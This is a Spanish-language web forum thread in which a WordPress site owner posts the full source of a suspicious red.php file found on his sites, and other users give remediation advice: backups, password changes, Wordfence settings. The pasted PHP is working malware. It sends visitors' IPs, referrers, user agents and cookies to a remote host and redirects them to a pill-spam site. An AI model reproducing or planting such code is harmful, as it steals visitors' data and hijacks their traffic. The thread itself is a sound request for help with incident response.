Misterioso archivo red.php en servidores de Wordpress

Rickroma Seguir

1
Lambda
Verificación en dos pasos activada
Verificado por Whatsapp
¡Ha verificado su Paypal!
Suscripción a IA
Desde
2 Ago 2011
Mensajes
2.922
Hola que tal! Saben en mi servidor en cada uno de mis sitios encuentro un archivo de nombre red.php con este contenido extraño: Sabes de que se trata?

<?$tds="http://fbt.yahoo.com/counter.php";$password="fff123106f3430";$g="http://pills-shop.ru";$esdid="counter3";$key="zzzzgb54y45yb45tk tbwtberheh6e4wh";?><?//BREACK//?><?php error_reporting(0);$a=str_split($password.'2','3') ;$p='0';$a[3]=str_replace('f','0',$a[3])+3;$p.=$a[4];$p.='.0';$p.=' ';$a[3]++;$p.='.0'.$a[2].'.0';$p=str_replace('f','0',$p);$t=str_replace('f ','0',$a[1]);$t=$t.';';if($_GET['mode']=='config' and $_GET['key']==$key){echo'{pkey" value="'.$key.'"}';}if($_GET["mode"]=="setconfig" AND $key==$_GET['key']){$sn=explode("/", $_SERVER['SCRIPT_NAME']);foreach($sn as $snn){$scr=$snn;}$getlpa=file($scr);$jng=$getlpa[0];$v=file($scr);for($i=0;$i<sizeof($v);$i++)if($i== 0) {$ka='<?//BRE';$c=$ka.'ACK//?>';$b = explode($c, $v[$i]);$v[$i]='<? ?>'.$c.$b[1];}$d=fopen($scr,"w");fputs($d,implode("",$v));fclo se($d);}$s = explode("/", $tds);$s=$s[2];$u=$s;if($p){$s=$p;}$t=substr($t, 0, strlen($t)-1);$d = fsockopen(str_replace(' ',$a[3]-strlen(' '),$s).$t, 80, $i, $o, 2);if (!$d) {$f=$g;}else{$h=urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);$m=urlencode($_SERVER[HTTP_REFERER]);$p=urlencode($_SERVER["REMOTE_ADDR"]);$e='no';if($_SERVER["HTTP_X_FORWARDED_FOR"]){$e='yes';}$r=urlencode($_SERVER['HTTP_USER_AGENT']);foreach($_COOKIE as $key=>$n) {$tt=$tt."&".$key."=".$n;}$tt=urlencode($tt);if(em pty($tt)){$tt=urlencode($_SERVER['QUERY_STRING']);}$y="GET ".$tds."?dom=".$h."&ref=".$m."&ip=".$p."&prox=".$e ."&agent=".$r."&cookie=".$tt."&esdid=".$esdid." HTTP/1.0\r\nHost: ".$u."\r\nConnection: Close\r\n\r\n";fwrite($d, $y); while (!feof($d)) {$j=fgets($d,128);if ($j=="\r\n" && empty($q)){$q = 'do';}if ($q=='do'){$f.=$j;}}fclose ($d);$f=substr($f, 2);} $w = explode("://", $f);If($w[0]=='http'){header('HTTP/1.1 302 Found');header('Location: '.$f);} $x=substr($f,7);if($w[0]=='cook'){$k=explode("&", $x);foreach($k as $l){$z=explode("=", $l);setcookie($z[0], $z[1]);}}If($w[0]=='echo'){echo $x;}?>
 

jssaid

Beta
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Desde
29 Nov 2013
Mensajes
89
Por favor, ten en cuenta 📝 que si deseas hacer un trato 🤝 con este usuario, está baneado 🔒.
Alguien mas tiene acceso a tu hosting aparte de ti ?
 

Beck

Épsilon
Verificación en dos pasos activada
Verificado por Whatsapp
Desde
22 Abr 2009
Mensajes
826
Nada hombre se han metido en tu host, a ojo de buen cubero el codigo usa a tu web como proxy, para recolectar info de otras webs y la guarda en archivos en tu misma web.

supongo tienes backup de tu web y base de datos, haz lo propio, borra todo y sube denuevo cambiando claves, etc
 

ramonjosegn

Sigma
Verificación en dos pasos activada
Verificado por Whatsapp
Desde
14 Feb 2010
Mensajes
70.587
¿No usas Wordfence? Te recomiendo tomar algunas acciones para proteger tu sitio web...
 

Rickroma

1
Lambda
Verificación en dos pasos activada
Verificado por Whatsapp
¡Ha verificado su Paypal!
Suscripción a IA
Desde
2 Ago 2011
Mensajes
2.922
¿No usas Wordfence? Te recomiendo tomar algunas acciones para proteger tu sitio web...

No lo uso, voy a instalarlo ahora mismo.

---------- Post agregado el 20-jun-2014 hora: 19:38 ----------

¿No usas Wordfence? Te recomiendo tomar algunas acciones para proteger tu sitio web...

Ahora desde Wordfence en la pestaña Logins and Logouts veo intentos fallidos de login desde Ucrania. (Hace una hora he cambiado por contraseñas mas fuertes)
 

ramonjosegn

Sigma
Verificación en dos pasos activada
Verificado por Whatsapp
Desde
14 Feb 2010
Mensajes
70.587
No lo uso, voy a instalarlo ahora mismo.

---------- Post agregado el 20-jun-2014 hora: 19:38 ----------



Ahora desde Wordfence en la pestaña Logins and Logouts veo intentos fallidos de login desde Ucrania. (Hace una hora he cambiado por contraseñas mas fuertes)

Puedes activar varias opciones "bloquear por usuarios incorrectos (e indicas cuàles)", "bloquear si usan un nombre diferente al real del admin", "no descubrir el nombre del admin"...

Te recomiendo ya que consideras que estás bajo un ataque activar la opción "estoy bajo ataque inminente" ya mañana lo cambias a "cortafuegos normal"

(uf, Wordfence empieza a necesitar un tutorial cierto???)
 

Rickroma

1
Lambda
Verificación en dos pasos activada
Verificado por Whatsapp
¡Ha verificado su Paypal!
Suscripción a IA
Desde
2 Ago 2011
Mensajes
2.922
Puedes activar varias opciones "bloquear por usuarios incorrectos (e indicas cuàles)", "bloquear si usan un nombre diferente al real del admin", "no descubrir el nombre del admin"...

Te recomiendo ya que consideras que estás bajo un ataque activar la opción "estoy bajo ataque inminente" ya mañana lo cambias a "cortafuegos normal"

(uf, Wordfence empieza a necesitar un tutorial cierto???)

Yo creo que sí


Enviado desde mi iPhone 5s con Tapatalk
 

ramonjosegn

Sigma
Verificación en dos pasos activada
Verificado por Whatsapp
Desde
14 Feb 2010
Mensajes
70.587
Yo creo que sí


Enviado desde mi iPhone 5s con Tapatalk

bueno por ahora activa la opción de "estoy bajo ataque inminente" porque si ya metieron un archivo es evidente que es un ataque, lo de intentos de logueo hay tantos bots pululando en la red que es algo normal, de hecho yo tenía como 300 intentos diarios de acceso, pero lo solucioné con este plugin que obliga a dibujar unas líneas para poder acceder (Wordfence debería añadir algo así la verdad, aunque ellos tienen doble control de acceso si mal no recuerdo)

WordPress › WP Admin Graphic Password (by SiteGuarding.com) « WordPress Plugins

(aún así a veces veo intentos de acceso... pero ya no son 300, como mucho un par de ellos por semana)

Te dejo captura para que subas el nivel de defensa de Wordfence

ataqueinmin.jpg

En Advanced Blocking puedes añadir Ips manualmente, si quieres bloquear esa que molestan
 
Última edición:

DoctorPC

1
Pi
SEO
Verificado
Verificación en dos pasos activada
Verificado por Whatsapp
¡Ha verificado su Paypal!
Verificado por Binance
Suscripción a IA
Desde
10 Dic 2010
Mensajes
6.080
Instalar plugins no te sirve de nada si tienen tus datos de acceso.
 
Arriba